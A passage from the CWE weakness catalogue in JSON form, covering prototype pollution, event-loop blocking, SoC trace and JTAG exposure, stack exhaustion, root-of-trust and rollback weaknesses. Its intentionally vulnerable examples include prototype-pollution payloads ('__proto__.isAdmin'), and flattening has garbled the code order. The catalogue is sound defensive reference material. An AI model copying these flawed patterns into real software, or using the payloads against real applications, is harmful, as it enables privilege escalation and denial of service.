(\'Prototype Pollution\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.","Extended_Description":{"xhtml:p":["By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf).","This weakness is usually exploited by using a special attribute of objects called proto, constructor or prototype. Such attributes give access to the object prototype. This weakness is often found in code that assigns object attributes based on user input, or merges or clones objects recursively."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"915","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Likelihood":"High","Note":"An attacker can inject attributes that are used in other components."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Likelihood":"High","Note":"An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.","Effectiveness":"High","Effectiveness_Notes":"While this can mitigate this weakness completely, other methods are recommended when possible, especially in components used by upstream software (\\"libraries\\")."},{"Phase":"Architecture and Design","Description":"By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.","Effectiveness":"High"},{"Phase":"Implementation","Strategy":"Input Validation","Description":"When handling untrusted objects, validating using a schema can be used.","Effectiveness":"Limited"},{"Phase":"Implementation","Description":"By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This function sets object attributes based on a dot-separated path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"function setValueByPath (object, path, value) {","xhtml:br":"","xhtml:div":{"#text":"const pathArray = path.split(\\".\\");const attributeToSet = pathArray.pop();let objectToModify = object;for (const attr of pathArray) {objectToModify[attributeToSet] = value;return object;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"if (typeof objectToModify[attr] !== \'object\') {objectToModify = objectToModify[attr];}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"objectToModify[attr] = {};}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"setValueByPath({}, \\"__proto__.isAdmin\\", true)setValueByPath({}, \\"constructor.prototype.isAdmin\\", true)","xhtml:br":["",""]}},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"function setValueByPath (object, path, value) {","xhtml:br":"","xhtml:div":{"#text":"const pathArray = path.split(\\".\\");const attributeToSet = pathArray.pop();let objectToModify = object;for (const attr of pathArray) {objectToModify[attributeToSet] = value;return object;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"if (attr === \\"__proto__\\" || attr === \\"constructor\\" || attr === \\"prototype\\") {if (typeof objectToModify[attr] !== \\"object\\") {objectToModify = objectToModify[attr];}","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"// Ignore attributes which resolve to object prototype","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"continue;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"objectToModify[attr] = {};}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}}}],"Body_Text":["This function does not check if the attribute resolves to the object prototype. These codes can be used to add \\"isAdmin: true\\" to the object prototype.","By using a denylist of dangerous attributes, this weakness can be eliminated."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-3721","Description":"Prototype pollution by merging objects.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3721"},{"Reference":"CVE-2019-10744","Description":"Prototype pollution by setting default values to object attributes recursively.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10744"},{"Reference":"CVE-2019-11358","Description":"Prototype pollution by merging objects recursively.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358"},{"Reference":"CVE-2020-8203","Description":"Prototype pollution by setting object attributes based on dot-separated path.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8203"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1148"}},{"attr":{"@_External_Reference_ID":"REF-1149"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous External Contributor","Submission_Date":"2020-08-25"}}},"1322":{"attr":{"@_ID":"1322","@_Name":"Use of Blocking Code in Single-threaded, Non-blocking Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a non-blocking model that relies on a single threaded process\\n\\t\\t\\tfor features such as scalability, but it contains code that can block when it is invoked.","Extended_Description":{"xhtml:p":["When an attacker can directly invoke the blocking code, or the blocking code can be affected by environmental conditions that can be influenced by an attacker, then this can lead to a denial of service by causing unexpected hang or freeze of the code. Examples of blocking code might be an expensive computation or calling\\n\\t\\t\\t\\tblocking library calls, such as those that perform exclusive file operations or require a successful network operation.","Due to limitations in multi-thread models, single-threaded\\n\\t\\t\\t\\tmodels are used to overcome the resource constraints that are caused by using\\n\\t\\t\\t\\tmany threads. In such a model, all code should generally be\\n\\t\\t\\t\\tnon-blocking. If blocking code is called, then the event loop will\\n\\t\\t\\t\\teffectively be stopped, which can be undesirable or dangerous. Such\\n\\t\\t\\t\\tmodels are used in Python asyncio, Vert.x, and Node.js, or other\\n\\t\\t\\t\\tcustom event loop code.",""]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"835","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"An unexpected call to blocking code can trigger an infinite loop, or a large loop that causes the software to pause and wait indefinitely."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Generally speaking, blocking calls should be\\n\\t\\t\\t\\t\\treplaced with non-blocking alternatives that can be used asynchronously.\\n\\t\\t\\t\\t\\tExpensive computations should be passed off to worker threads, although\\n\\t\\t\\t\\t\\tthe correct approach depends on the framework being used."},{"Phase":"Implementation","Description":"For expensive computations, consider breaking them up into\\n\\t\\t\\t\\t\\tmultiple smaller computations. Refer to the documentation of the\\n\\t\\t\\t\\t\\tframework being used for guidance."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Content_History":{"Submission":{"Submission_Name":"Joe Harvey","Submission_Date":"2019-10-25"}}},"1323":{"attr":{"@_ID":"1323","@_Name":"Improper Management of Sensitive Trace Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Trace data collected from several sources on the\\n System-on-Chip (SoC) is stored in unprotected locations or\\n transported to untrusted agents.","Extended_Description":{"xhtml:p":["To facilitate verification of complex System-on-Chip\\n (SoC) designs, SoC integrators add specific IP blocks that\\n trace the SoC\'s internal signals in real-time. This\\n infrastructure enables observability of the SoC\'s internal\\n behavior, validation of its functional design,\\n and detection of hardware and software bugs. Such tracing\\n IP blocks collect traces from several sources on the SoC\\n including the CPU, crypto coprocessors, and on-chip fabrics. Traces collected from these sources are then\\n aggregated inside trace IP block and forwarded to trace\\n sinks, such as debug-trace ports that facilitate debugging by\\n external hardware and software debuggers.","Since\\n these traces are collected from several security-sensitive\\n sources, they must be protected against untrusted\\n debuggers. If they are stored in unprotected memory, an\\n untrusted software debugger can access these traces and\\n extract secret information. Additionally, if\\n security-sensitive traces are not tagged as secure, an\\n untrusted hardware debugger might access them to extract\\n confidential information."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory","Note":"An adversary can read secret values if they are captured in debug traces and stored unsafely."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Tag traces to indicate owner and debugging privilege level (designer, OEM, or end user) needed to access that trace."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In a SoC, traces generated from sources\\n include security-sensitive IP blocks such as CPU (with\\n tracing information such as instructions executed and\\n memory operands), on-chip fabric (e.g., memory-transfer\\n signals, transaction type and destination, and\\n on-chip-firewall-error signals), power-management\\n IP blocks (e.g., clock- and power-gating signals), and\\n cryptographic coprocessors (e.g., cryptographic keys and\\n intermediate values of crypto operations), among\\n other non-security-sensitive IP blocks including timers\\n and other functional blocks. The collected traces are\\n then forwarded to the debug and trace interface used by\\n the external hardware debugger.","Example_Code":[{"#text":"The traces do\\n not have any privilege level attached to them. All\\n collected traces can be viewed by any debugger (i.e., SoC\\n designer, OEM debugger, or end user).","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Some of the\\n traces are SoC-design-house secrets, while some are OEM\\n secrets. Few are end-user secrets and the rest are\\n not security-sensitive. Tag all traces with the\\n appropriate, privilege level at the source. The bits\\n indicating the privilege level must be immutable in\\n their transit from trace source to the final, trace\\n sink. Debugger privilege level must be checked before\\n providing access to traces.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"167"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1150"}},{"attr":{"@_External_Reference_ID":"REF-1151"}}]},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-07-20"}}},"1324":{"attr":{"@_ID":"1324","@_Name":"Sensitive Information Accessible by Physical Probing of JTAG Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sensitive information in clear text on the JTAG\\n interface may be examined by an eavesdropper, e.g.\\n by placing a probe device on the interface such as a logic\\n analyzer, or a corresponding software technique.","Extended_Description":{"xhtml:p":"On a debug configuration with a remote host,\\n unbeknownst to the host/user, an attacker with physical\\n access to a target system places a probing device on the\\n debug interface or software related to the JTAG port e.g.\\n device driver. While the authorized host/user performs\\n sensitive operations to the target system, the attacker\\n uses the probe to collect the JTAG traffic."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"300","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"May be introduced when design does not plan for an attacker having physical access while legitimate user is remotely operating device"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Files or Directories","Read Application Data"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Manufacturing","Description":"Disable permanently the JTAG interface before releasing the system to untrusted users.","Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Encrypt all information (traffic) on the JTAG interface using an approved algorithm (such as recommended by NIST). Encrypt the path from inside the chip to the trusted user application.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Block access to secret data from JTAG.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A TAP accessible register is read/written by a JTAG\\n based tool, for internal tool use for an authorized\\n user. The JTAG based tool does not provide access to\\n this data to an unauthorized user of the tool.\\n However, the user can connect a probing device and\\n collect the values directly from the JTAG interface, if\\n no additional protections are employed."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"167"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Organization":"Accellera Systems Initiative","Submission_Date":"2020-10-01"}}},"1325":{"attr":{"@_ID":"1325","@_Name":"Improperly Controlled Sequential Memory Allocation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects.","Extended_Description":{"xhtml:p":"While the product might limit the amount of memory that is allocated in a single operation for a single object (such as a malloc of an array), if an attacker can cause multiple objects to be allocated in separate operations, then this might cause higher total memory consumption than the developer intended, leading to a denial of service."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"789","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion","Description":"When a weakness allocates excessive memory on the stack, it is often described as \\"stack exhaustion,\\" which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Memory)","Note":"Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure multiple allocations of the same kind of object are properly tracked - possibly across multiple sessions, requests, or messages. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary."},{"Phase":"Operation","Description":"Run the program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example contains a small allocation of stack memory. When the program was first constructed, the number of times this memory was allocated was probably inconsequential and presented no problem. Over time, as the number of objects in the database grow, the number of allocations will grow - eventually consuming the available stack, i.e. \\"stack exhaustion.\\" An attacker who is able to add elements to the database could cause stack exhaustion more rapidly than assumed by the developer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int end_limit = get_nmbr_obj_from_db();int i;int *base = NULL;int *p =base;for (i = 0; i < end_limit; i++){}","xhtml:i":"// Gets the size from the number of objects in a database, which over time can conceivably get very large","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"*p = alloca(sizeof(int *));p = *p;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// Allocate memory on the stack","// // Point to the next location to be saved"],"xhtml:br":["",""]}}},"Body_Text":"Since this uses alloca(), it allocates memory directly on the stack. If end_limit is large enough, then the stack can be entirely consumed."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-36049","Description":"JavaScript-based packet decoder uses concatenation of many small strings, causing out-of-memory (OOM) condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36049"},{"Reference":"CVE-2019-20176","Description":"Product allocates a new buffer on the stack for each file in a directory, allowing stack exhaustion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20176"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"130"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-12-07"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}}},"1326":{"attr":{"@_ID":"1326","@_Name":"Missing Immutable Root of Trust in Hardware","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) implements secure boot by verifying or authenticating signed boot code. The signing of the code is achieved by an entity that the SoC trusts. Before executing the boot code, the SoC verifies that the code or the public key with which the code has been signed has not been tampered with. The other data upon which the SoC depends are system-hardware settings in fuses such as whether \u201cSecure Boot is enabled\u201d. These data play a crucial role in establishing a Root of Trust (RoT) to execute secure-boot flows.","One of the many ways RoT is achieved is by storing the code and data in memory or fuses. This memory should be immutable, i.e., once the RoT is programmed/provisioned in memory, that memory should be locked and prevented from further programming or writes. If the memory contents (i.e., RoT) are mutable, then an adversary can modify the RoT to execute their choice of code, resulting in a compromised secure boot.","Note that, for components like ROM, secure patching/update features should be supported to allow authenticated and authorized updates in the field."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during policy definition, hardware architecture, design, manufacturing, and/or provisioning and can be identified later during testing or system configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Authentication","Authorization"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Modify Memory"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Automated testing can verify that RoT components are immutable.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Root of trust elements and memory should be part of architecture and design reviews.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the system, the RoT should be designated for storage in a memory that does not allow further programming/writes."},{"Phase":"Implementation","Description":"During implementation and test, the RoT memory location should be demonstrated to not allow further programming/writes."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The RoT is stored in memory. This memory can be modified by an adversary. For example, if an SoC implements \u201cSecure Boot\u201d by storing the boot code in an off-chip/on-chip flash, the contents of the flash can be modified by using a flash programmer. Similarly, if the boot code is stored in ROM (Read-Only Memory) but the public key or the hash of the public key (used to enable \u201cSecure Boot\u201d) is stored in Flash or a memory that is susceptible to modifications or writes, the implementation is vulnerable.","Body_Text":["In general, if the boot code, key materials and data that enable \u201cSecure Boot\u201d are all mutable, the implementation is vulnerable.","Good architecture defines RoT as immutable in hardware. One of the best ways to achieve immutability is to store boot code, public key or hash of the public key and other relevant data in Read-Only Memory (ROM) or One-Time Programmable (OTP) memory that prevents further programming or writes."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"68"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1152"}},{"attr":{"@_External_Reference_ID":"REF-1153"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"}}},"1327":{"attr":{"@_ID":"1327","@_Name":"Binding to an Unrestricted IP Address","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely.","Extended_Description":{"xhtml:p":"When a server binds to the address 0.0.0.0, it allows connections from every IP address on the local machine, effectively exposing the server to every possible network. This might be much broader access than intended by the developer or administrator, who might only be expecting the server to be reachable from a single interface/network."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Client Server","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Cloud Computing","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"System Configuration"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Amplification","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Assign IP addresses that are not 0.0.0.0.","Effectiveness":"High"},{"Phase":"System Configuration","Strategy":"Firewall","Description":"Unwanted connections to the configured server may be denied through a firewall or other packet filtering measures.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code snippet uses 0.0.0.0 in a Puppet script.","Example_Code":[{"#text":"signingserver::instance {","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":"","xhtml:div":{"#text":"\\"nightly-key-signing-server\\":}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listenaddr => \\"0.0.0.0\\",port => \\"9100\\",code_tag => \\"SIGNING_SERVER\\",","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}},{"#text":"signingserver::instance {","attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:br":"","xhtml:div":{"#text":"\\"nightly-key-signing-server\\":}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listenaddr => \\"127.0.0.1\\",port => \\"9100\\",code_tag => \\"SIGNING_SERVER\\",","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}}],"Body_Text":"The Puppet code snippet is used to provision a signing server that will use 0.0.0.0 to accept traffic. However, as 0.0.0.0 is unrestricted, malicious users may use this IP address to launch frequent requests and cause denial of service attacks."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1158"}},{"attr":{"@_External_Reference_ID":"REF-1159"}}]},"Content_History":{"Submission":{"Submission_Name":"Akond Rahman","Submission_Organization":"Tennessee Technological University","Submission_Date":"2020-09-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}}},"1328":{"attr":{"@_ID":"1328","@_Name":"Security Version Number Mutable to Older Versions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) implements secure boot or verified boot. It might support a security version number, which prevents downgrading the current firmware to a vulnerable version. Once downgraded to a previous version, an adversary can launch exploits on the SoC and thus compromise the security of the SoC. These downgrade attacks are also referred to as roll-back attacks.","The security version number must be stored securely and persistently across power-on resets. A common weakness is that the security version number is modifiable by an adversary, allowing roll-back or downgrade attacks or, under certain circumstances, preventing upgrades (i.e. Denial-of-Service on upgrades). In both cases, the SoC is in a vulnerable state."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"757","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware architecture and design, and can be identified later during testing or system configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication","Authorization"],"Impact":"Other","Likelihood":"High","Note":"Impact includes roll-back or downgrade to a vulnerable version of the firmware or DoS (prevent upgrades)."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Mutability of stored security version numbers and programming with older firmware images should be part of automated testing.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Anti-roll-back features should be reviewed as part of Architecture or Design review.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the system, security version data should be designated for storage in registers that are either read-only or have access controls that prevent modification by an untrusted agent."},{"Phase":"Implementation","Description":"During implementation and test, security version data should be demonstrated to be read-only and access controls should be validated."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A new version of firmware is signed with a security version number higher than the previous version. During the firmware update process the SoC checks for the security version number and upgrades the SoC firmware with the latest version. This security version number is stored in persistent memory upon successful upgrade for use across power-on resets.","Body_Text":["In general, if the security version number is mutable, the implementation is vulnerable. A mutable security version number allows an adversary to change the security version to a lower value to allow roll-back or to a higher value to prevent future upgrades.","The security version number should be stored in immutable hardware such as fuses, and the writes to these fuses should be highly access-controlled with appropriate authentication and authorization protections."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"176"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1329":{"attr":{"@_ID":"1329","@_Name":"Reliance on Component That is Not Updateable","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.","Extended_Description":{"xhtml:p":["If the component is discovered to contain a vulnerability or critical bug, but the issue cannot be fixed using an update or patch, then the product\'s operator will not be able to protect against the issue. This could leave the product open to attacker exploitation or critical operation failures.","In industries such as healthcare, \\"legacy\\"\\n\\t\\t\\t devices can be operated for decades. As a\\n\\t\\t\\t US task force report notes, \\"the inability\\n\\t\\t\\t to update or replace equipment has both\\n\\t\\t\\t large and small health care delivery\\n\\t\\t\\t organizations struggle with numerous\\n\\t\\t\\t unsupported legacy systems that cannot\\n\\t\\t\\t easily be replaced (hardware, software and\\n\\t\\t\\t operating systems) with large numbers of\\n\\t\\t\\t vulnerabilities and few modern\\n\\t\\t\\t countermeasures.\\" [REF-1197]","While hardware can be prone to 